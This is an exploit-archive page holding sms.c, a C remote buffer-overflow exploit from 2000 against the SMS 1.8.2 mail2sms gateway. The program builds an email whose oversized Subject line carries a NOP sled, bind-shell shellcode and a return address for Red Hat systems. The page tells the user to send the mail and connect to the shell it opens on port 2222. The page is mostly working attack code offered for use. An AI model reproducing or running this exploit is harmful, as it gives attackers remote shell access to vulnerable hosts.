sms.c

sms.c: Posted May 31, 2000; Authored by Venglin | Site b0f.freebsd.lublin.pl; sms.c is a remote SMS 1.8.2 (mail2sms gateway) long subject line remote buffer overflow exploit. Send the mail generated by this program and a shell will be listening on port 2222. Offsets adjusted for redhat.; tags | exploit, remote, overflow, shell; systems | linux, redhat; SHA-256 | 5263a1384cd6d126f626841f9e172551ca855196cc1ef2d42713cc721e51647b; Download | Favorite | View

sms.c

/*
 * sms, wersja: 1.8.2,
 * Wysylanie wiadomosci na telefony sieci Era, Plus GSM i Idea Centertel.
 *
 * *REMOTE EXPLOIT*
 *
 * (c) 2000 babcia padlina / buffer0verfl0w security (b0f.freebsd.lublin.pl)
 *
 * Send mail generated by program. After successfull exploiting, telnet
 * to port 2222.
 *
 * Sometimes adjusting parameter BUFSIZE may be useful. It depends on
 * procmail script configuration.
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP             0x90
#define OFS             0
#define BUFSIZE         914
#define ADDRS           8
#define RET             0xbffff970 /* most redhat boxes */

char shell[] = /* duke bind shellcode */
"\xeb\x10\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xc3\x31\xc0\xb0\x01\xcd"
"\x80\xc3\xe8\xeb\xff\xff\xff\xb0\x06\xcd\x80\xb0\x06\xfe\xc3\xcd"
"\x80\xb0\x06\xfe\xc3\xcd\x80\xb0\x02\xcd\x80\x39\xc1\x75\xdc\xe8"
"\xce\xff\xff\xff\xb0\x02\xb1\x01\xb2\x06\x52\x51\x50\xb3\x01\xb0"
"\x66\x89\xe1\xcd\x80\x89\xc6\xe8\xb6\xff\xff\xff\x83\xc4\x12\x50"
"\xb9\x02\xff\x08\xae\x30\xed\x51\x89\xe2\x83\xec\x06\xb0\x10\x50"
"\xb3\x02\x52\x56\xb0\x66\x89\xe1\xcd\x80\xb0\x10\x50\x56\xb0\x66"
"\xb3\x04\x89\xe1\xcd\x80\xe8\x87\xff\xff\xff\x50\x50\x56\xb0\x66"
"\xb3\x05\x89\xe1\xcd\x80\x31\xc9\x88\xc3\xb0\x29\xcd\x80\xb0\x3f"
"\xcd\x80\xeb\x16\x5e\x88\x4e\x07\x89\x76\x08\x89\x4e\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe5\xff\xff\xff"
"/bin/sh";

int main(argc, argv)
int argc;
char **argv;
{
        char *buf, *p;
        int noplen, i, ofs;
        long ret, *ap;

        if(!(buf = (char *)malloc(BUFSIZE+ADDRS+10)))
        {
                perror("malloc()");
                return -1;
        }

        if (argc > 1)
                ofs = atoi(argv[1]);
        else
                ofs = OFS;

        ret = RET + ofs;

        noplen = BUFSIZE - strlen(shell);

        memset(buf, NOP, noplen);
        buf[noplen+1] = '\0';
        strcat(buf, shell);

        p = buf + noplen + strlen(shell);
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

        fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));

        printf("Return-Path: @\n");
        printf("Subject: %s\n\n", buf);

        return 0;
}

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

sms.c

sms.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

sms.c

Share This

sms.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems